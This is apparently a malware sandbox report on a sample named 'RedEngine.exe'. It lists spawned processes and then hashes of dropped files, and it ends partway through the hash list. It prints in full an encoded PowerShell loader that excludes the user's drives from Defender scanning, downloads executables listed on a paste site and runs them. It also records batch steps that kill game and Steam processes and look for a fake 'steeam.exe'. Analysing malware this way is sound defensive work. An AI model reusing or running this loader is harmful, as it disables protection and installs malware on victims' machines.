"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4532

C:\Users\Admin\AppData\Roaming\gy5mlgfi.vhh0.exe
"C:\Users\Admin\AppData\Roaming\gy5mlgfi.vhh0.exe"
3⤵
PID:6164

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9202.tmp\9203.tmp\9204.bat C:\Users\Admin\AppData\Roaming\gy5mlgfi.vhh0.exe"
4⤵
PID:5444

C:\Windows\system32\chcp.com
chcp 1251
5⤵
PID:5692

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:5252

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:5912

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:5544

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
5⤵
PID:6912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
5⤵
PID:7068

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
PID:5932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
PID:5544

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
PID:3576

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6176

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
5⤵
PID:6680

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
5⤵
- Kills process with taskkill
PID:6528

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6368

C:\Windows\system32\find.exe
find /i "dota2.exe"
5⤵
PID:6848

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
5⤵
- Kills process with taskkill
PID:5620

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6836

C:\Windows\system32\find.exe
find /i "cs2.exe"
5⤵
PID:5728

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
5⤵
- Kills process with taskkill
PID:6664

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6560

C:\Windows\system32\find.exe
find /i "RustClient.exe"
5⤵
PID:6200

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
5⤵
- Kills process with taskkill
PID:5816

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6468

C:\Windows\system32\find.exe
find /i "GTA5.exe"
5⤵
PID:6884

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
5⤵
- Kills process with taskkill
PID:7976

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5388

C:\Windows\system32\find.exe
find /i "TslGame.exe"
5⤵
PID:7224

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
5⤵
- Kills process with taskkill
PID:4660

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:7652

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
5⤵
PID:7980

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
5⤵
- Kills process with taskkill
PID:7364

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:6864

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:7832

C:\Windows\system32\find.exe
find /i "steam.exe"
5⤵
PID:7288

C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
5⤵
- Kills process with taskkill
PID:5244

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:7876

C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
5⤵
PID:7828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7912

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:4656

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:8020

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:6756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7144

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:1032

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:964

C:\Users\Admin\AppData\Roaming\gy5mlgfi.vhh1.exe
"C:\Users\Admin\AppData\Roaming\gy5mlgfi.vhh1.exe"
3⤵
PID:5716

C:\Users\Admin\AppData\Roaming\gy5mlgfi.vhh2.exe
"C:\Users\Admin\AppData\Roaming\gy5mlgfi.vhh2.exe"
3⤵
PID:832

C:\Users\Admin\AppData\Roaming\gy5mlgfi.vhh3.exe
"C:\Users\Admin\AppData\Roaming\gy5mlgfi.vhh3.exe"
3⤵
PID:1616

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\92BD.tmp\92BE.tmp\92BF.bat C:\Users\Admin\AppData\Roaming\gy5mlgfi.vhh3.exe"
4⤵
PID:5580

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:880

C:\Windows\system32\where.exe
where node
5⤵
PID:6696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5656

C:\Users\Admin\Downloads\RedEngine\RedEngine.exe
"C:\Users\Admin\Downloads\RedEngine\RedEngine.exe"
1⤵
PID:5988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3552

C:\Users\Admin\AppData\Roaming\3zsntao5.1hl0.exe
"C:\Users\Admin\AppData\Roaming\3zsntao5.1hl0.exe"
3⤵
PID:2192

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9732.tmp\9733.tmp\9734.bat C:\Users\Admin\AppData\Roaming\3zsntao5.1hl0.exe"
4⤵
PID:6672

C:\Windows\system32\chcp.com
chcp 1251
5⤵
PID:5620

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:6416

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:6796

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:5612

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
5⤵
PID:6564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
5⤵
PID:6628

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
PID:5128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
PID:6916

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
PID:6220

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6408

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
5⤵
PID:5596

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
5⤵
- Kills process with taskkill
PID:6220

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5344

C:\Windows\system32\find.exe
find /i "dota2.exe"
5⤵
PID:5912

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
5⤵
- Kills process with taskkill
PID:6920

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5848

C:\Windows\system32\find.exe
find /i "cs2.exe"
5⤵
PID:1996

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
5⤵
- Kills process with taskkill
PID:6724

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:2752

C:\Windows\system32\find.exe
find /i "RustClient.exe"
5⤵
PID:5548

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
5⤵
- Kills process with taskkill
PID:5892

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6452

C:\Windows\system32\find.exe
find /i "GTA5.exe"
5⤵
PID:6656

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
5⤵
- Kills process with taskkill
PID:4360

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:1744

C:\Windows\system32\find.exe
find /i "TslGame.exe"
5⤵
PID:5808

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
5⤵
- Kills process with taskkill
PID:1684

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6472

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
5⤵
PID:5308

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
5⤵
- Kills process with taskkill
PID:7548

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:7344

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:7696

C:\Windows\system32\find.exe
find /i "steam.exe"
5⤵
PID:8064

C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
5⤵
- Kills process with taskkill
PID:7992

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:7368

C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
5⤵
PID:7496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7180

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7864

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7608

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:6376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4984

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7368

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6624

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7228

C:\Users\Admin\AppData\Roaming\3zsntao5.1hl1.exe
"C:\Users\Admin\AppData\Roaming\3zsntao5.1hl1.exe"
3⤵
PID:5680

C:\Users\Admin\AppData\Roaming\3zsntao5.1hl2.exe
"C:\Users\Admin\AppData\Roaming\3zsntao5.1hl2.exe"
3⤵
PID:5920

C:\Users\Admin\AppData\Roaming\3zsntao5.1hl3.exe
"C:\Users\Admin\AppData\Roaming\3zsntao5.1hl3.exe"
3⤵
PID:6296

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\98F7.tmp\98F8.tmp\98F9.bat C:\Users\Admin\AppData\Roaming\3zsntao5.1hl3.exe"
4⤵
PID:2308

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5500

C:\Windows\system32\where.exe
where node
5⤵
PID:5244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Command and Scripting Interpreter: PowerShell
PID:4496

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:5408

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
PID:7220

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6020

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5d3a9e.rbs
Filesize
823KB

MD5
2559ca4c4bfd5629498d68038620b4af

SHA1
ab10f33a81f0408d9dab2a712785ad261ce71687

SHA256
97f6d23d025aef53472936357c0373f46f5fc23007bae17ca607fd4857e9a767

SHA512
3e634354eb7059dfe82b263c4f5fab522d45bcf3988861b9686da40fe6688801f5c8fae879d690e22680096c2c782657ab659e9c9ca3307bd3b641504b287cfa

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSE
Filesize
11KB

MD5
dfc1b916d4555a69859202f8bd8ad40c

SHA1
fc22b6ee39814d22e77fe6386c883a58ecac6465

SHA256
7b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9

SHA512
1fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.js
Filesize
79B

MD5
24563705cc4bb54fccd88e52bc96c711

SHA1
871fa42907b821246de04785a532297500372fc7

SHA256
ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13

SHA512
2ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE
Filesize
754B

MD5
d2cf52aa43e18fdc87562d4c1303f46a

SHA1
58fb4a65fffb438630351e7cafd322579817e5e1

SHA256
45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

SHA512
54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\license
Filesize
1KB

MD5
b862aeb7e1d01452e0f07403591e5a55

SHA1
b8765be74fea9525d978661759be8c11bab5e60e

SHA256
fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f

SHA512
885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\license
Filesize
1KB

MD5
5ad87d95c13094fa67f25442ff521efd

SHA1
01f1438a98e1b796e05a74131e6bb9d66c9e8542

SHA256
67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

SHA512
7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.md
Filesize
818B

MD5
2916d8b51a5cc0a350d64389bc07aef6

SHA1
c9d5ac416c1dd7945651bee712dbed4d158d09e1

SHA256
733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

SHA512
508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSE
Filesize
780B

MD5
b020de8f88eacc104c21d6e6cacc636d

SHA1
20b35e641e3a5ea25f012e13d69fab37e3d68d6b

SHA256
3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

SHA512
4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSE
Filesize
730B

MD5
072ac9ab0c4667f8f876becedfe10ee0

SHA1
0227492dcdc7fb8de1d14f9d3421c333230cf8fe

SHA256
2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

SHA512
f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE
Filesize
802B

MD5
d7c8fab641cd22d2cd30d2999cc77040

SHA1
d293601583b1454ad5415260e4378217d569538e

SHA256
04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

SHA512
278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js
Filesize
16KB

MD5
bc0c0eeede037aa152345ab1f9774e92

SHA1
56e0f71900f0ef8294e46757ec14c0c11ed31d4e

SHA256
7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

SHA512
5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.json
Filesize
1KB

MD5
d116a360376e31950428ed26eae9ffd4

SHA1
192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

SHA256
c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

SHA512
5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSE
Filesize
763B

MD5
7428aa9f83c500c4a434f8848ee23851

SHA1
166b3e1c1b7d7cb7b070108876492529f546219f

SHA256
1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

SHA512
c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.json
Filesize
28B

MD5
56368b3e2b84dac2c9ed38b5c4329ec2

SHA1
f67c4acef5973c256c47998b20b5165ab7629ed4

SHA256
58b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd

SHA512
d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.json
Filesize
26B

MD5
2324363c71f28a5b7e946a38dc2d9293

SHA1
7eda542849fb3a4a7b4ba8a7745887adcade1673

SHA256
1bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4

SHA512
7437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.js
Filesize
17KB

MD5
cf8f16c1aa805000c832f879529c070c

SHA1
54cc4d6c9b462ad2de246e28cd80ed030504353d

SHA256
77f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573

SHA512
a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.js
Filesize
15KB

MD5
9841536310d4e186a474dfa2acf558cd

SHA1
33fabbcc5e1adbe0528243eafd36e5d876aaecaa

SHA256
5b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9

SHA512
b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url
Filesize
168B

MD5
1c1f6159630c170b596af7c9085f8bb0

SHA1
ac26cfe43e10a9f76aee943f9ceff3dc77df29fd

SHA256
61403502b3d584ab749a417955dda3d6c956e64109cc4ac4e46e44b462b7c4f0

SHA512
f93d2e86c287ed4e50a0c00bcd9594c322cfbd0507bbd191d97c7dd2881850296986139df9580ba1bbaae8abab284335db64c41f6edde441e34fa56b934c3046

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url
Filesize
133B

MD5
35b86e177ab52108bd9fed7425a9e34a

SHA1
76a1f47a10e3ab829f676838147875d75022c70c

SHA256
afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319

SHA512
